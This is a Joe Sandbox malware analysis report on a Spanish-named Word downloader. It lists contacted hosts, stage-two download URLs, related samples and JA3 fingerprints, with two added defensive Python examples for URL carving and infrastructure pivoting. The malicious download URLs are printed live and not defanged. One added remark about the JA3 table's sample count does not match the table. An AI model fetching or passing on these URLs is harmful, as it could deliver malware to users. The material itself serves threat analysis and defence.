                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://cps.letsencrypt.org0powershell.exe, 00000005.00000002.338769822.0000019232712000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmpfalse
                                        high
                                        http://certs.godaddy.com/repository/1301powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpfalse
                                          high
                                          https://contoso.com/Iconpowershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                            high
                                            https://www.odwebp.svc.msEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://api.powerbi.com/v1.0/myorg/groupsEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                              high
                                              https://web.microsoftstream.com/video/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                high
                                                https://certs.godaddy.com/repository/0powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://www.calltorepair.com/project/world-business/powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  https://graph.windows.netEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                    high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://crl.godaddy.com/gdroot-g2.crl0Fpowershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://www.calltorepair.com/wp-content/themes/thefox/includes/Flexslider/flexslider.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                          high
                                                          https://www.calltorepair.com/wp-content/themes/thefox/includes/zilla-likes/styles/zilla-likes.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          unknown
                                                          https://www.calltorepair.com/wp-content/themes/thefox/includes/prettyPhoto/css/prettyPhoto.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          unknown
                                                          https://ncus.contentsync.EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://adm.tools/support/powershell.exe, 00000005.00000002.338722577.00000192326F9000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                              high
                                                              http://weather.service.msn.com/data.aspxEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                high
                                                                https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo.pngpowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                • Avira URL Cloud: phishing
                                                                unknown
                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                  high
                                                                  https://www.calltorepair.com/wp-json/powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                  • Avira URL Cloud: phishing
                                                                  unknown
                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                    high
                                                                    https://www.calltorepair.com/wp-content/uploads/2021/01/big_mob_logo-1.pngpowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                    • Avira URL Cloud: phishing
                                                                    unknown
                                                                    https://wus2.contentsync.EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://clients.config.office.net/user/v1.0/iosEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                      high
                                                                      http://certificates.godaddy.com/repository/0powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://www.calltorepair.com/wp-content/themes/thefox/js/html5.jspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                        • Avira URL Cloud: phishing
                                                                        unknown
                                                                        https://o365auditrealtimeingestion.manage.office.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                          high
                                                                          https://outlook.office365.com/api/v1.0/me/ActivitiesEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                            high
                                                                            https://clients.config.office.net/user/v1.0/android/policiesEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                              high
                                                                              https://entitlement.diagnostics.office.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                high
                                                                                https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/js/rs6.min.jspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                • Avira URL Cloud: phishing
                                                                                unknown
                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                  high
                                                                                  https://outlook.office.com/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                    high
                                                                                    https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreatupowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                    • Avira URL Cloud: phishing
                                                                                    unknown
                                                                                    https://storage.live.com/clientlogs/uploadlocationEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                      high
                                                                                      https://www.calltorepair.com/wp-content/themes/thefox/css/animations.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                      • Avira URL Cloud: phishing
                                                                                      unknown
                                                                                      https://www.calltorepair.com/project/luv-summer/powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                      • Avira URL Cloud: phishing
                                                                                      unknown
                                                                                      https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.jspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                      • Avira URL Cloud: phishing
                                                                                      unknown
                                                                                      https://graph.windows.net/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                        high
                                                                                        https://devnull.onenote.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                          high
                                                                                          https://messaging.office.com/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                              high
                                                                                              https://skyapi.live.net/Activity/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://www.calltorepair.com/wp-content/themes/thefox/css/thefox_js_composer.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                              • Avira URL Cloud: phishing
                                                                                              unknown
                                                                                              https://giatot365.compowershell.exe, 00000005.00000002.340780682.0000019232C21000.00000004.00000001.sdmptrue
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://giatot365.com/wp-content/uploads/2powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmptrue
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://api.cortana.aiEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                high
                                                                                                https://www.calltorepair.com/wp-admin/admin-ajax.phppowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                • Avira URL Cloud: phishing
                                                                                                unknown
                                                                                                https://www.calltorepair.com/xmlrpc.php?rsdpowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                • Avira URL Cloud: phishing
                                                                                                unknown
                                                                                                https://staging.cortana.aiEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://opheliasbrewery.compowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://onedrive.live.com/embed?EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                  high
                                                                                                  https://augloop.office.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                    high
                                                                                                    https://www.calltorepair.com/about-us/powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    unknown
                                                                                                    http://giatot365.compowershell.exe, 00000005.00000002.340780682.0000019232C21000.00000004.00000001.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/css/rs6.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    unknown
                                                                                                    https://www.calltorepair.com/wp-content/themes/thefox/style_end.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    unknown
                                                                                                    https://www.calltorepair.com/wp-includes/css/dist/block-library/style.min.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    unknown
                                                                                                    https://api.diagnostics.office.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                      high
                                                                                                      https://store.office.de/addinstemplateEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                        high
                                                                                                        https://wus2.pagecontentsync.EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
URL | Source | Malicious | Antivirus detection | Reputation
https://api.powerbi.com/v1.0/myorg/datasets | EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | false | (none) | high
https://www.calltorepair.com/project/great-project/ | powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmp | true | Avira URL Cloud: phishing | unknown
https://cortana.ai/api | EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.dr | false | URL Reputation: safe (3x) | unknown
http://cherkashchanu.com | powershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://servicios.semperti.com | powershell.exe, 00000005.00000002.338722577.00000192326F9000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
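Three of the URLs above were not in the document itself but were carved out of powershell.exe memory dumps (the .sdmp sources), which is why a downloader's stage-two hosts turn up even when the script is obfuscated. The following is an added example, not Joe Sandbox code, of the same carving done offline: it scans a dump for ASCII and UTF-16LE printable runs (PowerShell, being .NET, keeps its strings as UTF-16LE, so an ASCII-only `strings` pass misses most of them), applies a URL regex to each run, trims the quote and bracket debris that usually trails a carved URL, and de-duplicates in first-seen order. The byte buffer is constructed for the example from URLs that appear in this report; the function names are this example's own.

```python
import re
from collections import OrderedDict

# Printable runs of at least 8 chars, narrow (ASCII) and wide (UTF-16LE),
# equivalent to `strings -a -n 8` and `strings -el -n 8`.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")

# Deliberately excludes quotes so a URL embedded in a PowerShell string
# literal ends at the closing quote; trailing punctuation is trimmed below.
URL_RE = re.compile(r"https?://[A-Za-z0-9._~:/?#@!$&*+,;=%()\[\]-]+")
TRAILING = ".,;:)]'\""

# Constructed stand-in for a powershell.exe memory dump (not a real .sdmp):
# one ASCII URL, two UTF-16LE URLs (one inside a quoted literal), one benign
# Office URL followed by a stray parenthesis, and non-printable filler.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"http://cherkashchanu.com/Z:/4ZE8/"
    + b"\x00" * 8
    + "https://www.calltorepair.com/project/great-project/".encode("utf-16le")
    + b"\x00\x00\xff\xfe"
    + "'http://tongdaihanoi.com/847346324234234/rpnvXm/'".encode("utf-16le")
    + b"\x00" * 4
    + b"https://api.powerbi.com/v1.0/myorg/datasets)"
    + b"\x90" * 20
)


def printable_strings(buf):
    """Yield (text, encoding) for every ASCII and UTF-16LE run in buf."""
    for m in ASCII_RUN.finditer(buf):
        yield m.group().decode("ascii"), "ascii"
    for m in WIDE_RUN.finditer(buf):
        yield m.group().decode("utf-16le"), "utf-16le"


def extract_urls(buf):
    """Return [(url, encoding)] unique, in first-seen order, debris trimmed."""
    found = OrderedDict()
    for text, enc in printable_strings(buf):
        for url in URL_RE.findall(text):
            url = url.rstrip(TRAILING)
            found.setdefault(url, enc)
    return list(found.items())


def host_of(url):
    """Host part of a URL, lower-cased, for matching against the contact tables."""
    return re.sub(r"^https?://", "", url).split("/", 1)[0].lower()


if __name__ == "__main__":
    for url, enc in extract_urls(SAMPLE_DUMP):
        print(f"{enc:9s} {host_of(url):28s} {url}")
```

Run against a real dump, the interesting output is the set of hosts that are not Microsoft or Office telemetry; for this sample that is the Contacted IPs list below. Carved URLs are only ever as trustworthy as the string they came from, so the path component should be verified in the HTTP capture before it is used as an indicator.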

                                                                                                          Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
139.180.215.83 | xuanthinhshop.com | United States | 20473 | AS-CHOOPA (US) | true
185.104.45.33 | cherkashchanu.com | Ukraine | 200000 | UKRAINE-AS (UA) | true
107.180.2.185 | calltorepair.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLC (US) | true
151.106.5.169 | tongdaihanoi.com | Germany | 29066 | VELIANET-AS velianet Internetdienste GmbH (DE) | true
103.28.39.103 | giatot365.com | Viet Nam | 131353 | NHANHOA-AS-VN Nhan Hoa Software company (VN) | true
35.209.212.48 | opheliasbrewery.com | United States | 19527 | GOOGLE-2 (US) | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 369338
Start date: 16.03.2021
Start time: 14:25:56
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 20s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Adjunto K_23165.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@7/15@9/6
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 67%
• Number of executed functions: 10
• Number of non-executed functions: 4
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 104.42.151.234, 23.211.6.115, 52.109.32.63, 52.109.8.24, 52.109.76.33, 52.255.188.83, 13.88.21.125, 23.57.80.111, 51.11.168.160, 2.20.142.209, 2.20.142.210, 51.103.5.186, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Execution Graph export aborted for target powershell.exe, PID 6388 because it is empty
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
14:27:06 | API Interceptor | 31x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match: associated sample name / URL (detection); context
139.180.215.83
  Adjunto K_23165.doc (malicious)
185.104.45.33
  Adjunto K_23165.doc (malicious); context: cherkashchanu.com/Z:/4ZE8/
107.180.2.185
  Adjunto K_23165.doc (malicious)
  SecuriteInfo.com.W97M.DownLoader.5028.13042.doc (malicious)
  Informacion 122020 N-98239.doc (malicious)
151.106.5.169
  Adjunto K_23165.doc (malicious); context: tongdaihanoi.com/847346324234234/rpnvXm/
103.28.39.103
  Adjunto K_23165.doc (malicious)
  Informacion 122020 N-98239.doc (malicious)
  INFO.doc (malicious)
35.209.212.48
  SecuriteInfo.com.W97M.DownLoader.5028.13042.doc (malicious); context: opheliasbrewery.com/wp-includes/ciAjcgj/

Domains

Match: associated sample name / URL (detection); context (resolved IP)
opheliasbrewery.com
  Adjunto K_23165.doc (malicious); 35.208.137.128
  SecuriteInfo.com.W97M.DownLoader.5028.13042.doc (malicious); 35.209.212.48
xuanthinhshop.com
  Adjunto K_23165.doc (malicious); 139.180.215.83
tongdaihanoi.com
  Adjunto K_23165.doc (malicious); 151.106.5.169
  Archivo-2020-98864.doc (malicious); 112.78.2.74
calltorepair.com
  SecuriteInfo.com.W97M.DownLoader.5028.13042.doc (malicious); 107.180.2.185
  Informacion 122020 N-98239.doc (malicious); 107.180.2.185
giatot365.com
  Adjunto K_23165.doc (malicious); 103.28.39.103
  Informacion 122020 N-98239.doc (malicious); 103.28.39.103
  INFO.doc (malicious); 103.28.39.103
cherkashchanu.com
  Adjunto K_23165.doc (malicious); 185.104.45.33

ASN

Match: associated sample name / URL (detection); context (IP)
UKRAINE-AS (UA)
  Adjunto K_23165.doc (malicious); 185.104.45.33
  QUOTATION.xlsx (malicious); 185.68.16.173
  QUOTATION.xlsx (malicious); 185.68.16.173
  ORDER LIST.xlsx (malicious); 185.104.45.146
  Purchasing List 0202021.doc (malicious); 185.104.45.46
  LOI.exe (malicious); 194.247.13.97
  7UA1651581370.xlsm (malicious); 185.68.16.179
  test9.exe (malicious); 185.68.16.210
  SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.20877.rtf (malicious); 185.68.16.40
  mb10.exe (malicious); 185.68.16.39
  mb10.exe (malicious); 185.68.16.39
  http://mjk-s.com.ua/wp-content/multifunctional_module/external_profile/j2v4gnkgki_y47879vx/ (malicious); 185.68.16.20
  L5xudZSpVV.doc (malicious); 185.68.16.20
  L5xudZSpVV.doc (malicious); 185.68.16.20
  adEk5sVMp4.doc (malicious); 185.68.16.20
  ga9fG4BxR7.doc (malicious); 185.68.16.20
  adEk5sVMp4.doc (malicious); 185.68.16.20
  ga9fG4BxR7.doc (malicious); 185.68.16.20
  V54Y7pqGrU.doc (malicious); 185.68.16.20
  5zzM0jY7ky.doc (malicious); 185.68.16.20
AS-CHOOPA (US)
  Adjunto K_23165.doc (malicious); 139.180.215.83
  Company profile.exe (malicious); 45.76.27.130
  unpacked.exe (malicious); 45.32.138.49
  haleng.exe (malicious); 207.246.80.14
  530000.exe (malicious); 104.238.188.98
  POCS1570.xlsx (malicious); 45.77.78.61
  POCS1570.xlsx (malicious); 45.77.78.61
  PDC_156280_5635_ALF.xlsx (malicious); 45.77.78.61
  GetUserNames.EXE (malicious); 78.141.210.78
  PDC_156280_5635_ALF.xlsx (malicious); 45.77.78.61
  2021_03_04.exe.exe (malicious); 45.63.92.9
  packet426.exe (malicious); 107.191.45.186
  PAYMENT-FB21026518_10493_PINQ_202102161.xlsx (malicious); 45.77.78.61
  PAYMENT-FB21026518_10493_PINQ_202102161.xlsx (malicious); 45.77.78.61
  ORDER_2020_54.xlsx (malicious); 45.77.78.61
  ORDER_2020_54.xlsx (malicious); 45.77.78.61
  6f0000.exe (malicious); 136.244.108.143
  UmFXBfylHx.docx (malicious); 149.28.152.49
  UmFXBfylHx.docx (malicious); 149.28.152.49
  OMUDY6GMZI.exe (malicious); 45.76.172.113
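The IPs, Domains and ASN context tables above, and the JA3 Fingerprints table that follows, are the raw material for infrastructure pivoting: a related sample is one that reused this sample's hosts. The tables also show why a naive pivot misleads. 107.180.2.185 sits on GoDaddy shared hosting (AS26496) and the JA3 table lists eight unrelated executables talking to it, and the ASN rows for AS-CHOOPA and UKRAINE-AS are dominated by samples that have nothing to do with this document. The following is an added example, not Joe Sandbox code, that ranks the related samples by shared indicators while discounting any indicator seen with too many distinct samples to be a meaningful pivot. The indicator/sample pairs are transcribed from the tables on this page; the threshold, weighting and function names are this example's own assumptions.

```python
from collections import defaultdict

THIS_SAMPLE = "Adjunto K_23165.doc"

# Indicators this sample contacted, from the "Contacted IPs" table above.
OWN_INDICATORS = {
    "139.180.215.83", "xuanthinhshop.com",
    "185.104.45.33", "cherkashchanu.com",
    "107.180.2.185", "calltorepair.com",
    "151.106.5.169", "tongdaihanoi.com",
    "103.28.39.103", "giatot365.com",
    "35.209.212.48", "opheliasbrewery.com",
}

# (indicator, associated sample) pairs transcribed from the IPs, Domains and
# JA3 context tables of this report; rows naming this sample are omitted
# because OWN_INDICATORS already covers them.
CONTEXT_ROWS = [
    ("107.180.2.185", "SecuriteInfo.com.W97M.DownLoader.5028.13042.doc"),
    ("107.180.2.185", "Informacion 122020 N-98239.doc"),
    ("103.28.39.103", "Informacion 122020 N-98239.doc"),
    ("103.28.39.103", "INFO.doc"),
    ("35.209.212.48", "SecuriteInfo.com.W97M.DownLoader.5028.13042.doc"),
    ("opheliasbrewery.com", "SecuriteInfo.com.W97M.DownLoader.5028.13042.doc"),
    ("tongdaihanoi.com", "Archivo-2020-98864.doc"),
    ("calltorepair.com", "SecuriteInfo.com.W97M.DownLoader.5028.13042.doc"),
    ("calltorepair.com", "Informacion 122020 N-98239.doc"),
    ("giatot365.com", "Informacion 122020 N-98239.doc"),
    ("giatot365.com", "INFO.doc"),
    # JA3 3b5074b1b5d032e5620f69f9f700ff0e connections to the GoDaddy host
    ("107.180.2.185", "Purchase Order.exe"),
    ("107.180.2.185", "SecuriteInfo.com.Trojan.PWS.Stealer.29934.17809.exe"),
    ("107.180.2.185", "NewOrder20527.exe"),
    ("107.180.2.185", "RFLinkClient-2.30.0.29010.exe"),
    ("107.180.2.185", "5gS1ZiVlSw.exe"),
    ("107.180.2.185", "SecuriteInfo.com.Variant.Razy.803564.32187.exe"),
    ("107.180.2.185", "DMAipyp8Qd.exe"),
    ("107.180.2.185", "f76RDb9vm6.exe"),
]

# Assumed tuning: an indicator seen with more than WEAK_FANOUT distinct
# samples (shared hosting, CDN, bulletproof ASN) counts only WEAK_WEIGHT.
WEAK_FANOUT = 5
WEAK_WEIGHT = 0.1


def fanout(rows=CONTEXT_ROWS, own=OWN_INDICATORS, this=THIS_SAMPLE):
    """Map each indicator to the number of distinct samples it was seen with."""
    seen = defaultdict(set)
    for ind in own:
        seen[ind].add(this)
    for ind, sample in rows:
        seen[ind].add(sample)
    return {ind: len(samples) for ind, samples in seen.items()}


def weak_pivots(rows=CONTEXT_ROWS, own=OWN_INDICATORS, this=THIS_SAMPLE):
    """Indicators too widely shared to attribute on their own."""
    return sorted(i for i, n in fanout(rows, own, this).items() if n > WEAK_FANOUT)


def rank_related(rows=CONTEXT_ROWS, own=OWN_INDICATORS, this=THIS_SAMPLE):
    """Return [(sample, score, strong_shared, weak_shared)], best match first."""
    fo = fanout(rows, own, this)
    by_sample = defaultdict(set)
    for ind, sample in rows:
        if sample != this:
            by_sample[sample].add(ind)
    ranked = []
    for sample, inds in by_sample.items():
        shared = inds & own
        strong = sorted(i for i in shared if fo[i] <= WEAK_FANOUT)
        weak = sorted(i for i in shared if fo[i] > WEAK_FANOUT)
        score = round(len(strong) + WEAK_WEIGHT * len(weak), 2)
        ranked.append((sample, score, strong, weak))
    ranked.sort(key=lambda r: (-r[1], r[0]))
    return ranked


def defang(ioc):
    """Render an indicator so it cannot be clicked or auto-linked."""
    return ioc.replace("http", "hxxp").replace(".", "[.]")


if __name__ == "__main__":
    print("weak pivots:", [defang(i) for i in weak_pivots()])
    for sample, score, strong, weak in rank_related():
        print(f"{score:4.1f}  {sample}  strong={strong} weak={weak}")
```

With the page's data the two other Spanish-named maldocs (Informacion 122020 N-98239.doc and the SecuriteInfo W97M downloader) each share three low-fan-out hosts with this sample and rank first, INFO.doc and Archivo-2020-98864.doc follow, and the eight executables that only share the GoDaddy host score 0.1, which is the right reading of that table. Note too that opheliasbrewery.com and tongdaihanoi.com resolved to different IPs in different analyses, so the domain is the stable indicator and the IP is the transient one.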

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection (context IP on the following line)
3b5074b1b5d032e5620f69f9f700ff0e | Purchase Order.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.PWS.Stealer.29934.17809.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | NewOrder20527.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | RFLinkClient-2.30.0.29010.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | 5gS1ZiVlSw.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Variant.Razy.803564.32187.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | DMAipyp8Qd.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | f76RDb9vm6.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | pcKhfy4rvU.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.PWS.Siggen2.61780.11290.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.GenericKD.36276772.23649.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | U1bBBCbWZ1.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | New Order.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.PWS.Siggen2.62670.17922.exe | malicious
• 107.180.2.185
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Trojan.GenericKD.45862691.7587.exe | malicious
• 107.180.2.185
